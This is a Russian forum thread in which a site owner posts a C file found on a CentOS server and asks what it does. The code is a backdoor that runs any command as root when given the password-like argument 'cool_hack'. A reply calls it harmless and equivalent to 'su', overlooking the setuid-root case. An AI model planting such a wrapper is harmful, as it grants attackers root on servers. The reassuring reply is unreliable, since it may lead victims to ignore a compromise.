Неизвестный скрипт на C

@AliShayx · Регистрация: 14.10.2017

Студворк — интернет-сервис помощи студентам

Добрый времени суток!

На сайте обнаружил странный файл с расширением .c . Открыл текстовым редактором, а там код:
Подскажите плис что он делает с сервером, ОС centos. Мне надо узнать что он делает.

C
1
2
3
4
5
6
7
8
9
10
11
12
13
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
    if(argc == 3){
    if(strcmp(argv[1],"cool_hack") == 0){
    setgid(0);
    setuid(0);
    system(argv[2]);
    }
    }
    return 0;
}

Evg · 14.10.2017, 18:27

Его нужно скомпилировать до исполняемого приложения

Его нужно запускать с двумя параметрами. Если первый параметр равен "cool_hack", то будет выставлен пользователь root:root (при запуске из-под обычного пользователя, очевидно, с такими запросами пошлют куда подальше), после чего будет запущено приложение из второго параметра

@AliShayx · 14.10.2017, 18:35 **[ТС]**

Спасибо, вроде понятно. Взлом получается.

Evg · 14.10.2017, 18:45

Сообщение от AliShayx

Взлом получается

Очень сомнительно

Code
1
$ ./prog cool_hack trampampam

ничем не отличается от

Code
1
2
$ su -
$ trampampam

Для root'а в обоих вариантах запустится программа trampampam (хоть с этим вирусом "талибан", хоть в консоли). Для не-root'а в обоих случаях с получением root'овых прав пошлют куда подальше

Новые блоги и статьи Все статьи Все блоги /
Подстановка значения реквизита справочника в табличную часть документа Maks 10.04.2026 Алгоритм из решения ниже реализован на примере нетипового документа "ПланированиеПерсонала", разработанного в конфигурации КА2. Задача: при выборе сотрудника (справочник Сотрудники) в ТЧ документа. . .	Очистка реквизитов документа при копировании Maks 09.04.2026 Алгоритм из решения ниже применим как для типовых, так и для нетиповых документов на самых различных конфигурациях. Задача: при копировании документа очищать определенные реквизиты и табличную. . .	модель ЗдравоСохранения 8. Подготовка к разному выполнению заданий anaschu 08.04.2026 https:/ / github. com/ shumilovas/ med2. git main ветка * содержимое блока дэлэй из старой модели теперь внутри зайца новой модели 8ATzM_2aurI	Блокировка документа от изменений, если он открыт у другого пользователя Maks 08.04.2026 Алгоритм из решения ниже реализован на примере нетипового документа, разработанного в конфигурации КА2. Задача: запретить редактирование документа, если он открыт у другого пользователя. / / . . .
Система безопасности+живучести для сервера-слоя интернета (сети). Двойная привязка. Hrethgir 08.04.2026 Далее были размышления о системе безопасности. Сообщения с наклонным текстом - мои. А как нам будет можно проверить, что ссылка наша, а не подделана хулиганами, которая выбросит на другую ветку и. . .	Модель ЗдрввоСохранения 7: больше работников, больше ресурсов. anaschu 08.04.2026 работников и заданий может быть сколько угодно, но настроено всё так, что используется пока что только 20% kYBz3eJf3jQ	Дальние перспективы сервера - слоя сети с космологическим дизайном интефейса карты и логики. Hrethgir 07.04.2026 Дальнейшее ближайшее планирование вывело к размышлениям над дальними перспективами. И вот тут может быть даже будут нужны оценки специалистов, так как в дальних перспективах всё может очень сильно. . .	Горе от ума kumehtar 07.04.2026 Эта мне ментальная установка, что вот прямо сейчас, мол, мне для полного счастья не хватает (нужное вписать), и когда я этого достигну - тогда и полный кайф. Одна из самых сильных ловушек на пути. . . .

Evg 21281 / 8305 / 637 Регистрация: 30.03.2009 Сообщений: 22,660 Записей в блоге: 30
	14.10.2017, 18:27
	Его нужно скомпилировать до исполняемого приложения Его нужно запускать с двумя параметрами. Если первый параметр равен "cool_hack", то будет выставлен пользователь root:root (при запуске из-под обычного пользователя, очевидно, с такими запросами пошлют куда подальше), после чего будет запущено приложение из второго параметра 1

@AliShayx 0 / 0 / 0 Регистрация: 14.10.2017 Сообщений: 2
	14.10.2017, 18:35 [ТС]
	Спасибо, вроде понятно. Взлом получается. 0